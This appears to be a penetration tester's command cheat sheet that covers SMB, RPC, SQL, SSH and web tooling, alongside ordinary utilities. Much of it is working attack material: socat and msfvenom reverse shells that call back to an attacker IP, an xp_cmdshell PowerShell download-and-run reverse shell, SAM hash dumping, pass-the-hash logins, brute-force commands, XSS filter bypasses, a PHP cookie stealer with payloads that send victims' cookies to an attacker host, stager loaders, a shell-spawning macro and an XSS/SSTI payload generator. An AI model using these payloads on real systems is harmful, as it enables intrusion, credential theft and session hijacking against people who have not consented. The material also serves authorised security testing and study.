sudo mount -o nolock IP_here:/share_name_here /path/to/mounted_share/
sudo mount -o nolock,vers=3 IP_here:/share_name_here /path/to/mounted_share/
sudo mount -o port=port_here IP_here:/share_name_here /path/to/mounted_share/
# connect anonymously
rpcclient -U "" IP_here
rpcclient -U "" -N IP_here
# connect as user
rpcclient -U username%password IP_here
# find domain name
querydominfo
# domain look-up
lookupdomain domain_here
# enumerate domain users / find RID
enumdomusers
# whoami
getusername
# display description fields
querydispinfo
querydispinfo2
querydispinfo3
# enumerate registry keys
winreg_enumkey key_name_here
querymultiplevalues key_name_here value_here som_other_value_here
querymultiplevalues2 key_name_here value_here som_other_value_here
# read eventlog
eventlog_readlog offset_here no_bytes_here
# backup eventlog file
eventlog_backuplog log_name_here backup_name_here
# get eventlog info
eventlog_loginfo log_name_here
# get WKSSVC computer names
wkssvc_enumeratecomputernames
# get WKSSVC users
wkssvc_enumerateusers
# enumerate DFS shares
dfsenum
dfsenumex share_name_here
# get DFS share info
dfsgetinfo path_here server_name_here share_name_here
# get server info
srvinfo
# enumerate shares
netshareenum
netshareenumall
# get share info
netsharegetinfo share_name_here
# enumerate files on share
netfileenum
# get file security on share
netfilegetsec
# enumerate sessions
netsessenum
# enumerate disks
netdiskenum
# enumerate connections
netconnenum
# get DC
getanydcname domain_here
getdcname
dsr_getdcname
dsr_getdcnameex
dsr_getdcnameex2
# get DC info
dsgetdcinfo
# get forest trust info
dsr_getforesttrustinfo
# enumerate trusted domains
dsr_enumtrustdom
dsenumdomtrusts
netrenumtrusteddomains
netrenumtrusteddomainsex
enumtrust
# enumerate domains
enumdomains
# logongetdomaininfo (attempts to open /var/lib/samba/private/secrets.tdb)
logongetdomaininfo
# sam lookup
samlookupnames builtin name_here another_name_here
samlookupnames domain name_here another_name_here
samlookuprids
# convert SID to name
lookupsids
lookupsids3
lookupsids_level
# convert name to SID
lookupnames user_name_here
lookupnames4 user_name_here
lookupnames_level
# enumerate privileges
enumprivs
getdispname privilege_name_here
lsaenumprivsaccount SID_here
lsaenumacctrights SID_here
# get user alias
queryuseraliases builtin SID_here
queryuseraliases domain SID_here
# establish connection
nc -nv IP_here 554
nc -nvC IP_here 554
# send DESCRIBE request - e.g. determine auth / unauth access
DESCRIBE rtsp://<ip>:<port> RTSP/1.0\r\nCSeq: 2\r\n\r\n
# HTTP server
ruby -run -e httpd -p port_here
# show logged in users
rusers -l IP_here
# dump hashes from SYSTEM + SAM
samdump2 /path/to/copy/of/system /path/to/copy/of/sam
# list all services
sc.exe queryex type=service state=all
# list all services - names only
sc.exe queryex type=service state=all | find /i "SERVICE_NAME:"
# list all running services
sc.exe queryex type=service state=active
# show service config
sc.exe qc service_name_here
# get service state
sc.exe query service_name_here
# start service
sc.exe start service_name_here
net start service_name_here
# stop service
sc.exe stop service_name_here
# change service config : change START_TYPE to AUTOMATIC / AUTO_START
sc.exe config service_name_here start= auto
# copy remote file to local machine
scp user@IP_here:/path/to/remote/file /path/to/local/file
# copy local file to remote machine
scp /path/to/local/file user@IP_here:/path/to/remote/file
# authenticate with ssh key + copy remote file to local machine
scp -i private_key_here user@IP_here:/path/to/remote/file /path/to/local/file
# authenticate with ssh key + copy local file to remote machine
scp -i private_key_here /path/to/local/file user@IP_here:/path/to/remote/file
# connect to specific port - copy remote file to local machine
scp -P port_here user@IP_here:/path/to/remote/file /path/to/local/file
scp user@IP_here:port_here//path/to/remote/file /path/to/local/file
# display full path + URL to exploit
searchsploit -p short_path_here
# exclude term from search
searchsploit --exclude="term_here"
# search exploit
searchsploit search_term1_here search_term2_here
# view exploit
searchsploit -x short_path_here
# copy exploit to current working directory
searchsploit -m short_path_here
# update searchsploit
sudo apt install exploitdb # package + db
searchsploit -update # db
# run Seatbelt.exe
.\Seatbelt.exe all
# run specific checks
.\Seatbelt.exe check_here another_check_here
# delete spaces from string
echo "my string with spaces here" | sed -r 's/( )+//g'
# delete new lines from string
echo "my string with spaces here" | sed -z 's/\n//g;s/$/\n/'
# replace word_here in output stream
echo "something with a specific word_here" | sed 's/word_here/new_word_here/'
# change UID
sudo sed -i -e 's/old_UID/new_UID/g' /etc/password
# print lines between begin_pattern and end_pattern from file
sed -n '/begin_pattern/,/end_pattern/p' filename_here
# connect as user
sftp -oPort=port user@IP_here
# upload file
put /path/to/local/file [/path/remote]
# download file
get /path/to/remote/file
# enumerate SIP servers
svmap IP_range_here
# enumerate valid extensions for SIP endpoints
svwar -m INVITE IP_here
# enumerate shares / services with anonymous login
smbclient //IP_here/IPC$ -N
smbmap -H IP_here
smbmap -H IP_here -P port_here # samba : 139
crackmapexec smb IP_here --shares
smbclient -L netbios_name_here -N
smbclient -L netbios_name_here -I IP_here -N
nmap --script=smb-enum-shares IP_here
rpcclient -U "" -N IP_here
netshareenumall
netshareenum
# enumerate smb shares / services as user_here
smbclient -L netbios_name_here -U user_name_here
smbclient -L netbios_name_here -I IP_here -U user_name_here
smbmap -u user -p password -d domain_here -H IP_here
crackmapexec smb IP_here -u user -p password --shares
# enumerate shares with ntlm password hash
smbclient -L netbios_name_here --pw-nt-hash -I IP_here -U user_name_here%password_hash_here
# recursively list share content + permissions for null session
smbmap -R share_here -H IP_here
# recursively list share content + permissions for user_here
smbmap -R share_here -H IP_here -d domain_here -u user_here -p password_here
# connect to a directory on a share as username
smbclient \\\\IP_here\\some_share -D some_folder -U username%password
# smbclient - upload file
put /path/to/local/file [/path/remote]
# upload file
smbmap -R share_here -H IP_here --upload /path/to/file
# download file
smbmap -R share_here -H IP_here --download /path/to/file
# smbclient - download file
get /path/to/remote/file
# recursiveley download files
smbmap -R share_name_here -H IP_here -A '.*'
# smbclient - bulk download every file on share
mask ""
recurse ON
prompt OFF
mget *
# read file
more filename_here
# mount smb share
sudo mount -t cifs -o 'user=user_here,password=password_here' //IP_here/share_here /path/to/mountpoint
# execute command
smbmap -u user_name_here -p 'password_here' -d domain_here -H IP_here -x 'command_here'
# force use of LANMAN1
nano /etc/samba/smb.conf # kali
client min protocol = LANMAN1 # global section
service smbd restart
# find samba version
## start wireshark
## initiate smb connection
smbclient -L \\IP_here
## "Session Setup AndX Request" packet (server response)
# enumerate SMB protocols
nmap --script smb-protocols -p 139,445 IP_here
# connect to SMTP
nc -nv IP_here 25
telnet IP_here 25
# list commands
nmap --script smtp-commands IP_here -p 25
# identify server
HELO hostname_here
EHLO hostname_here
# verify email
VRFY user_name_here
# enumerate SNMP port 161 with community string "public"
snmp-check IP_here
snmp-check IP_here -p 161 -c public
# enumerate MIB tree
snmpwalk -c community_string_here -v snmp_version_here -t time_out_in_seconds_here IP_here
# enumerate specific MIB value
snmpwalk -c community_string_here -v snmp_version_here -t time_out_in_seconds_here IP_here MIB_here
# brute force SNMP
onesixtyone -c community_strings_list_here -i IP_list_here
# write test : change sysName to test
snmpset -c public -v1 IP_here MIB_here s "test"
# SNMP v3
snmpwalk -l NoAuthNoPriv -u 'root' -v 3 IP_here # no authentication, no privacy (i.e. no encryption)
# connect to TCP port
socat -TCP4:target_IP:port_here
# listen
socat TCP4-LISTEN:port_here STDOUT
# share file
socat TCP4-LISTEN:port_here,fork file:infile_here
# retrieve file
socat TCP4:target_IP:port_here file:outfile_here,create
# reverse shell
## listener
socat -d -d TCP4-LISTEN:port_here STDOUT
## push shell
socat TCP4:attacker_IP:port_here EXEC:/bin/bash
# encrypted bind shell
## genereate self-signed cert
openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 363 -out shell.crt
## combine cert + private key into .pem
cat shell.key shell.crt > shell.pem
## set up listener on target, no SSL cert validation
socat OPENSSL-LISTENER:443,cert=shell.pem,verify=0,fork EXEC:/bin/bash
## connect from attacker machine
socat - OPENSSL:target_IP:443,verify=0
# determine no. of columns in table : (error - 1) = no_columns
ORDER BY increasing_no_here
UNION SELECT NULL,NULL # increase no. of NULL
# return no_here columns
LIMIT no_here
# identify displayed columns
UNION ALL SELECT 1,2,...,no_columns_here
# wildcard
%
# ASCII math = 2
67-ASCII('A')
51-ASCII(1)
# fingerprint database
## strings
'wurzel'||'sepp' # Oracle
'wurzel'+'sepp' # MSSQL
'wurzel' 'sepp' # MySQL
## numeric data : 0 on target db, error on any other db
BITAND(1,1)-BITAND(1,1) # Oracle
@@PACK_RECEIVED-@@PACK_RECEIVED # MSSQL
CONNECTION_ID()-CONNECTION_ID() # MySQL
# display database content
sqlite3 database_here .dump
.dump
# list tables
.tables
# show column names
.headers on
# save output in file
.output file_name_here
# quit sqlite3 shell
.quit
# display help
.help
# print column names
.schema table_name_here
# launch sqlmap from a GET / POST request file
python /path/to/sqlmap -r req.txt -p param_to_attack1,param2,param3
# set dbms
python /path/to/sqlmap -r req.txt -p param_to_attack1,param2,param3 --dbms=DBMS_here
# list available tampers
python /path/to/sqlmap --list-tampers
# try to priv esc !!risk=3 might damage db!!
python /path/to/sqlmap -r req.txt -p param_to_attack --level=1 --risk=3 --privesc
# dump database
python /path/to/sqlmap -r req.txt -p param_to_attack --dump
# execute command
python /path/to/sqlmap -r req.txt -p param_to_attack --os-cmd=command_here
# upload shell to target + get command prompt
python /path/to/sqlmap -r req.txt -p param_to_attack --os-shell
# designate injection point in request file : *
{"template":"{\"name\":\"123*\"}"}
# increase timeout (default: 30)
python /path/to/sqlmap -r req.txt -p param_to_attack --timeout=300
# techniques
## B = boolean-based blind
## E = error-based
## U = union query-based
## S = stacked queries
## T = time-based blind
## Q = inline queries
--technique BEUSTQ
# check which users webapp runs as
python /path/to/sqlmap -r req.txt --curent-user
# if run as root, dump password hashes for DB
python /path/to/sqlmap -r req.txt --passwords
# file read
python /path/to/sqlmap -r req.txt --file-read '/path/to/file/here'
# use sqlmap with proxy (can also bypass ssl error)
python /path/to/sqlmap -r req.txt --proxy=http://127.0.0.1:8080
# connect to SQL database
sqsh -S IP_here -U user_here -P password_here
sqsh -S IP_here:port_here -U user_here -P password_here
# sqsh - execute command on server
xp_cmdshell 'command_here'
go
# sqsh - turn on componant for xp_cmdshell (needs admin privs)
EXEC SP_CONFIGURE 'show advanced options',1
reconfigure
go
EXEC SP_CONFIGURE 'xp_cmdshell',1
reconfigure
go
# sqsh - get proper reverse shell from xp_cmdshell
## set up nishang
Invoke-PowerShellTcp -Reverse -IPAddress IP_here -Port port_here
## start web server
sudo python -m SimpleHTTPServer 80
## fetch rev shell via xp_cmdshell
xp_cmdshell "powershell IEX(New-Object Net.webclient).downloadString('http://attacker_IP_here/rev.ps1')"
go
# connect as user with password
ssh user@IP_here
# connect as user with password on port
ssh user@IP_here -p port_here
# connect as user with private key
ssh -i private_key user@IP_here
# check whether login as root is permitted
grep PermitRootLogin /etc/ssh/sshd_config
# create key pair
ssh-keygen
# local port forwarding - bind remote_port on target_IP to local_port on localhost (forward only internallly accessible port)
ssh -L local_port:127.0.0.1:remote_port user@target_IP_here
ssh -i /path/to/user\'s/private_key -L local_port:127.0.0.1:remote_port user@target_IP_here
# local port forwarding through proxy - opens port on localhost + forwards it to remote target, run from attacker box
ssh -N -L local_port_to_forward_from:target_IP_here:target_port_to_forward_to user@proxy_IP_here
# remote port forwarding through proxy - opens port on remote target + forwards it to localhost, run from target
ssh -N -R local_attacker_IP_here:local_attacker_port_here:127.0.0.1:target_port_here username_here@attacker_IP_here
# dynamic port forwarding
ssh -N -D 127.0.0.1:local_port_to_forward_from user@proxy_IP_here
# key exchange error
ssh -oKexAlgorithms=proposed_algorithm_here user@IP_here
# force use of legacy crypto, e.g. DSA
ssh -o PubKeyAcceptedKeyTypes=ssh-dss user@IP_here
# force use of cipher
ssh -c cipher_suite_here user@IP_here
# escape from rbash restricted shell
ssh username_here@IP_here -t "bash --noprofile"
# start service
sudo systemctl start ssh
# stop service
sudo systemctl stop ssh
# start service at boot time
sudo systemctl enable ssh
# disable service start at boot time
sudo systemctl disable ssh
# check for running service
sudo ss -plant | grep ssh
# brute force login
nmap --script ssh-brute --script-args userdb=/path/to/user_name_list,passdb=/path/to/wordlist IP_here -p 22
hydra -L /path/to/user_name_list -P /path/to/wordlist ssh://IP_here -t 4
# forward all traffic
sshuttle -r user_name_here@IP_SSH_server_here 0.0.0.0/0
# forward all traffic + proxy DNS requests to remote SSH server
sshuttle --dns -r user_name_here@IP_SSH_server_here 0.0.0.0/0
# forward all traffic + exclude pivoting IP from forwarding
sshuttle -r user_name_here@IP_SSH_server_here -x SSH_IP_here 0.0.0.0/0
# authenticate with private key
sudo sshuttle --ssh-cmd 'ssh -i /path/to/private/key' --dns -r user_name_here@IP_SSH_server_here 0.0.0.0/0
python3 -m sslzye domain_name_here
# enum subdomains
python3 /path/to/sublist3r.py -d domain_name_here
# enum subdomains + show results as they're found
python3 /path/to/sublist3r.py -d domain_name_here -v
# enum subdomains with specific tcp ports open
python3 /path/to/sublist3r.py -d domain_name_here -p port_here
# enum subdomains using specific search engine
python3 /path/to/sublist3r.py -d domain_name_here -e search_engine_name_here
# download repository
svn co svn://url_here
# show commit history
svn log
# revert to specific revision
svn up -r revision_number_here
# start service
sudo systemcctl start service_name_here
# stop service
sudo systemctl stop service_name_here
# start service at boot time
sudo systemctl enable service_name_here
# disable service start at boot time
sudo systemctl disable service_name_here
# check for running network service
sudo ss -plant | grep service_name_here
# list available services
sudo systemctl list-unit-files
# list tasks
task list
task project=project_name_here # list tasks in project
# list projects
task projects
# add task
task add description_here
task add description_here priority=H # H/M/L
task add description_here due=YYYY-MM-DD # tomorrow,friday etc. also works
task add description_here project=project_name_here # assign to project
# add recurring task
task add description_here due=1st recur=weekly # monthly etc. also works
task add description_here due=1st recur=weekly until=YYYY-MM-DD # monday etc. also works
# finish task
task id_here done
# list all interfaces
tcpdump -D
# monitor connections on interface
tcpdump -i interface_here
# monitor specific src and / or dst IP
tcpdump -i interface_here src IP_here and dst IP_here
# monitor specific dst IP and port
tcpdump -i interface_here dst IP_here and port port_here
# listen for ping
tcpdump -i interface_here icmp
tcpdump -i interface_here icmp and icmp[icmptype]=icmp-echo
# read .pcap
sudo tcpdump -r filename_here.pcap
# read .pcap + filter for src_IP
sudo tcpdump -n src src_IP_here -r filename_here.pcap
# read .pcap + filter for dst_IP
sudo tcpdump -n dst dst_IP_here -r filename_here.pcap
# read .pcap + filter for port
sudo tcpdump port port_here -r filename_here.pcap
# dump capture data (hex + ASCII)
sudo tcpdump -nX -r filename_here.pcap
# filter for packets with ACK + PSH flag
sudo tcpdump -A -n 'tcp[13] = 24' -r filename_here.pcap
sudo tcpdump -A -n 'tcp[tcpflags] & tcp-push != 0 & tcp-act != 0'
# connect
telnet IP_here
# connect as user
telnet -l user_name_here IP_here
# prompt for storage permissions
termux-setup-storage
# connect
tftp IP_here
# download file
get /path/to/file/on/tftp
# upload file
put /apth/to/local/file/here /path/to/file/on/tftp
# print help
?
# harvest data about domain from data_source
theHarvester -d domain_here -b data_source_here
# start new session
tmux new -s session_name_here
# start logging (requires tmux-logging plugin)
prefix + shift + p
# log pane history (requires tmux-logging plugin)
prefix + alt + shift + p
# detach session
prefix + d
# reattach session
tmux attach -d -t session_name_here
tmux attach -d -t session_id_here
# list sessions
tmux ls
# ping Oracle TNS listener
tnscmd10g -h IP_here -p 1521
# dump debug info into listener log
tnscmd10g debug -h IP_here -p 1521
tnscmd10g -h IP_here -p 1521 --rawcmd "(CONNECT_DATA=(COMMAND=debug))"
# reload config file for listener
tnscmd10g reload -h IP_here -p 1521
tnscmd10g -h IP_here -p 1521 --rawcmd "(CONNECT_DATA=(COMMAND=reload))"
# save config file for listener
tnscmd10g save_config -h IP_here -p 1521
tnscmd10g -h IP_here -p 1521 --rawcmd "(CONNECT_DATA=(COMMAND=save_config))"
# dump service data
tnscmd10g service -h IP_here -p 1521
tnscmd10g -h IP_here -p 1521 --rawcmd "(CONNECT_DATA=(COMMAND=service))"
# retrieve status
tnscmd10g status -h IP_here -p 1521
tnscmd10g -h IP_here -p 1521 --rawcmd "(CONNECT_DATA=(COMMAND=status))"
# shut down listener
tnscmd10g stop -h IP_here -p 1521
tnscmd10g -h IP_here -p 1521 --rawcmd "(CONNECT_DATA=(COMMAND=stop))"
# enumerate version
tnscmd10g version -h IP_here -p 1521
tnscmd10g -h IP_here -p 1521 --rawcmd "(CONNECT_DATA=(COMMAND=version))"
# replace newline with space
tr '\n' ' '
tr '\n' ' ' < /path/to/in/file
tr '\n' ' ' < /path/to/in/file > /path/to/out/file
# delete newline
tr -d '\n'
tr -d '\n' < /path/to/in/file
tr -d '\n' < /path/to/in/file > /path/to/out/file
# delete CR (e.g. Win file to Unix)
tr -d '\r' < /path/to/win_file/here > /path/to/unix_file/here
# replace LF with CR (e.g. Unix to Mac)
tr '\n' '\r' < /path/to/unix_file/here > /path/to/mac_file/here
# replace CR with LF (e.g. Mac to Unix)
tr '\r' '\n' < /path/to/mac_file/here > /path/to/unix_file/here
# list rules
ufw status
# add rule
ufw add allow port_here
ufw add deny port_here
# delete rule
ufw delete rule_number_here
# search for unquoted service path
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
# check permissions on folder
icacls C:\path\to\folder\
## permissions
D - Delete access
F - Full access (Edit_Permissions+Create+Delete+Read+Write)
N - No access
M - Modify access (Create+Delete+Read+Write)
RX - Read and eXecute access
R - Read-only access
W - Write-only access
## inheritance on folders
(OI) - object inherit
(CI) - container inherit
(IO) - inherit only
(NP) - don’t propagate inherit
(I) - Permission inherited from parent container
# check permissions on service --> AUTO_START
sc qc service_name_here
# generate reverse shell + transfer to victim
## x86
msfvenom -p windows/shell_reverse_tcp LHOST=attacker_IP LPORT=port_here -f exe -a x86 -o shell.exe
## x64
msfvenom -p windows/x64/shell_reverse_tcp LHOST=attacker_IP LPORT=port_here -f exe -a x64 -o shell.exe
# copy revshell to writable folder
copy shell.exe C:\path\to\folder\
# set up listener on kali
rlwrap nc -lnvp port_here
# restart vulnerable service or reboot
sc stop service_name_here
shutdown /r /t 0
shutdown /r /t 0 && exit
## restart with delay
shutdown /r /t 10 && exit
# set up share with password over SSL
python -m updog --password password_here --ssl
updog --password password_here --ssl
# compress + pack executable
upx -9 binary-here
# &
%26
# ?
%3f
# =
%3d
# <space>
+
%20
# <CR>
%0d
# <LF>
%0a
# +
%2b
# ;
%3b
# /
%2f
# shell spawning macro snippet
Sub Macro_name_here()
' some comment here
CreateObject("WScript.Shell").Run "cmd"
End Sub
# hello world in a message box
MsgBox "hello world"
# run binary
CreateObject("WScript.Shell").Run "binary_here.exe", 0, True
# guess signature + encryption
viewgen --guess "viewstate_here"
# jump to line
:line_number_here
# type =/=
!=
# pop changes from 1st window into 2nd
dp
# pops changes from 2nd window into 1st
do
# jump to next change
]c
# jump to previous change
[c
# switch to other window
Ctrl+w
# initialize virtual environment
virtualenv venv
# initialize virtual environment with specific python version as target interpreter
virtualenv --python=pythonversion_here venv
# activate virtual environment
## Linux
source venv/local/bin/activate # old: venv/bin/activate
## Win
. venv/Scripts/activate
# deactivate virtual environment
deactivate
# delete virtual environment
## Linux
rm -rf venv
## Win
del venv
# connect to VNC
vncviewer IP_here::5900
# find hosts with active WebDAV service
webclientscanner -dc-ip DC_IP_here domain_here:user_here:password_here@IP_range_here
# INPUT GENERATOR
#!/usr/bin/env python3
# >> input.py <<
# >> @muemmelmoehre <<
# generates distinguishable polyglott xss and ssti strings
# output can be pasted into every input field
# strings are written to ./inputstrings_<timestamp>.txt
import datetime # timestamps
import argparse # arguments
def main():
# get args
args = parse_arguments()
times = args.times
# prepare outfile
outfile = name_outfile()
# generate strings
## special chars
string = generate_specialchars()
file_write(outfile, "# SPECIAL CHARS")
file_write(outfile, "---------------")
file_write(outfile, string)
file_write(outfile, "\n")
## xss
file_write(outfile, "# XSS PAYLOADS")
file_write(outfile, "--------------")
for count in range(times):
string = generate_xssstring(count)
file_write(outfile, string)
file_write(outfile, "\n")
## ssti
file_write(outfile, "# SSTI PAYLOADS")
file_write(outfile, "---------------")
for count in range(times):
string = generate_sstistring(count)
file_write(outfile, string)
file_write(outfile, "\n")
def parse_arguments():
parser = argparse.ArgumentParser(description='Generates identifiable payloads for special characters, xss and ssti. Specify how many payloads you need with -t number_here, e.g. "python3 input.py -t 3".')
# times
parser.add_argument('-t', '--times', type=int, default=5, help='Number of payloads to generate, default is 5.')
args = parser.parse_args()
return args
# generate special char input
def generate_specialchars():
string = "'\"%<>@{}()\\/&*"
return string
# generate xss input
def generate_xssstring(id):
string = f"jAvAsCrIpT:/*-/*`/*\`/*'/*\"/**/(/* */oNcLiCk=prompt({id}))//%0D%0A%0d%0a//</StYlE/</tItLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=confirm({id})//>\x3e"
return string
# generate ssti input
def generate_sstistring(id):
string = " # string = "
string += f"{id}"
string += "}*11}} ${"
string += f"{id}"
string += "*11} <%= "
string += f"{id}"
string += "*11 %> $ #"
string += f"{id}"
string += "*11}} #{"
string += f"{id}"
string += "*11} *{"
string += f"{id}"
string += "*11}"
return string
# construct filename with timestamp
def name_outfile():
current_time = datetime.datetime.now()
timestamp = current_time.strftime("%Y-%m-%d_%H-%M-%S")
filename = f"inputstrings_{timestamp}.txt"
return filename
# write to file
def file_write(file, line):
file_path = file
with open(file_path, 'a') as f:
f.write(f"{line}\n")
if __name__ == "__main__":
main()
# update WES-NG
python /path/to/wes.py --update
# run WES-NG
python /path/to/wes.py /path/to/systeminfo.txt
# find priv esc exploits
python /path/to/wes.py /path/to/systeminfo.txt -i 'Elevation of Privilege' --exploits-only
# fuzz url
wfuzz -c -z file,/path/to/wordlist/here URL_here/FUZZ
wfuzz -c -w /path/to/wordlist/here URL_here/FUZZ
# fuzz subdomains
wfuzz -c -Z -w /path/to/wordlist --sc 200,202,204,301,302,307,403 http://FUZZ.domain.here
wfuzz --hw no_words_here -H "Host: FUZZ.domain.here" -w /path/to/wordlist IP_here
# retrieve folders + files from FTP
wget --mirror 'ftp://user_here:password_here@hostname.domain'
wget --mirror 'ftp://user_here:password_here@IP_here'
wget --m 'ftp://user_here:password_here@IP_here'
# recursively retrieve folders + files from FTP
wget -r 'ftp://user_here:password_here@IP_here'
# download file from FTP / HTTP / HTTPS
wget -O /path/to/outfile url_here
# set retries
wget --tries=no_here url_here # setting the value to 0 or inf makes wget retry forever
# run scan
whatweb url_here
# run aggressive scan
whatweb -a=3 url_here
# pretty print output
whatweb -v url_here
# get shell on IP_here as user with password
winexe -U domain_here/user_here%password_here cmd.exe
# get shell on IP_here as user with lm:ntlm hash
pth-winexe -U domain_here/user_here cmd.exe
# scan wordpress
wpscan --url url_here --enumerate ap # all plugins
wpscan --url url_here --enumerate at # all themes
wpscan --url url_here --enumerate cb # config backups
wpscan --url url_here --enumerate dbe # db exports
# brute force passwords
wpscan --url url_here -P /path/to/wordlist
# establish connection with password
xfreerdp /u:user_here /p:password_here /cert:ignore /v:IP_here
# establish connection via PtH
xfreerdp /u:user_here /pth:2nd_part_NTLMhash_here /cert:ignore /v:IP_here
# resize RDP window
xfreerdp /u:user_here /p:password_here /v:IP_here /smart-sizing:1920x1080
# list methods - POST
<?xml version="1.0"?>
<methodCall>
<methodName>system.listMethods</methodName>
<params>
<param>
</param>
</params>
</methodCall>
# general syntax - POST
<?xml version="1.0"?>
<methodCall>
<methodName>method_name_here</methodName>
<params>
<param>
<value>some_value_here</value>
</param>
<param>
<value><int>another_value_here</int></value>
</param>
<param>
<value><string>some_url:port_here</string></value>
</param>
</params>
</methodCall>
# probe service on remote host for OS
xprobe2 -v -p tcp:port_here:open IP_here
# filter bypasses
<sCrIpT>alert(1);</sCrIpT> # upper/lower case
<sCrIpT>alert(1); # no closing tag
<script/stuff>alert(1);</script> # random string after tag
<script
>alert(1);</script> # new line
<scr<script>ipt>alert(1);</scr</script>ipt># nested
<scr\x00ipt>alert(1);</scr\x00ipt> # null byte (IE)
<svg/onload=alert(1)>
<svg///////onload=alert(1)>
<svg id=x;onload=alert(1)>
<svg id=`x` onload=alert(1)>
<svg onload%09=alert(1)>
<svg %09onload=alert(1)>
<svg %09onload%20=alert(1)>
<svg onload%0B=alert(1)>
<svg onload%09%20%28%2C%3B=alert(1)>
<img onload=prompt(1)>
<script>confirm(1)</script>
# href
<a href="javascript:alert(1)">boomXSS</a>
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">boomXSS</a>
# form
<form action="javascript:alert(1)"><button>boomXSS</button></form>
<form id=x></form><button form="x" formaction="javascript:alert(1)">boomXSS</button>
# img
<img onload=alert(1)>
<svg onload=prompt(1)>
# object
<object data="javascript:alert(1)">
<object data="data:text/html,<script>alert(1)</script>">
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
# on...
<img src=x onerror=alert(1)>
<body onload=alert(1)>
<input type=image src=x:x onerror=alert(1)>
<isindex onmouseover="alert(1)">
<form oninput=alert(1)><input></form>
<textarea autofocus onfocus=alert(1)>
<input oncut=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video><source onerror="alert(1)">
<marquee onstart=alert(1)>
# cookie stealer (PHP)
## setup cookie stealer on attacker box
nano cookie.php
<?php
$cookie = $_GET['c'];
$file = fopen('stolen_cookies.txt', 'a+');
fwrite($file, 'Cookie: ' .$cookie,"\r\n");
fclose($file);
?>
## serve cookie stealer
sudo python -m SimpleHTTPServer 80
## XSS payload to place on victim site
<script>newImage().src="http://attacker_IP_here/cookie.php?c="document.cookie;</script>
## cookies get written to stolen_cookies.txt or observe traffic in wireshark
## alternative cookie stealer payload
<script>
var i=new Image();
i.src="http://attacker_IP_here/cookie.php?c="%2bdocument.cookie; # plus concatenation to any other string that might be passed here
</script>
## alternative
<script type=“text/javascript”>document.location=“http://attacker_IP_here/cookie.php?c="+document.cookie;</script>
# grab stager script
<script src="http://attacker_IP_here/stager.js"></script>
<img/onerror="var s=document.createElement('script');s.src='http://attacker_IP_here/stager.js'; document.getElementsByTagName('head')[0].appenChild(s);" src=a />
<svg/onload=body.appendChild(document.createElement`script`).src='http://attacker_IP_here/stager.js' hidden />
# basic payload cookie stealing
alert(document.cookie);
# cookie stealing via DOM
## .html file
<script>
function cookiepath(path){
for (var i = 0; i < window.frames.length; i++;){
frameURL = window.frames[i].location.toString();
if (frameURL.indexOf(path) > 1){
alert(window.frames[i].document.cookie);
}
}
}
</script>
<iframe onload="cookiepath('/app_path_here/')" style="display:none;" src="/app_path_here/index.php"></iframe>
# steal anti-CSRF token from DOM
<script>document.addEventListener("DOMContentLoaded",()=>alert(csrf.value))</script><link/rel="
# hidden iframe
<iframe src=http://attacker_IP_here/path/to/file height=”0” width=”0”></iframe>
# redirect victim to attacker-controlled URL
## test connection
### set up listener on attacker machine
sudo nc -lnvp 80
### place redirect in XSS on vulnerable page
<iframe src=http://attacker_IP_here/ height=”0” width=”0”></iframe>
## exploit
### prepare payload
### host payload on web server
sudo python -m SimpleHTTPServer 80
### place redirect in XSS on vulnerable page
<iframe src=http://attacker_IP_here/path/to/payload height=”0” width=”0”></iframe>
# DOM manipulation / defacing payload
document.body.innerHTML="some_defacing_here";
# action-based / DOM events
"><body onload="alert(1)">
" onload="javascript:alert(1)
" onload="alert('XSS')
" onload="alert(String.fromCharCode()88,83,83) #'XSS'
# XSS phishing: steal cookies through form action
document.forms[0].action="http://attacker_IP_here/cookie.php";
# plaintext hexdump
xxd -p filename_here
# extract password-protected archive (special characters in password need to be escaped with \)
7z e archive_here.zip -ppassword_here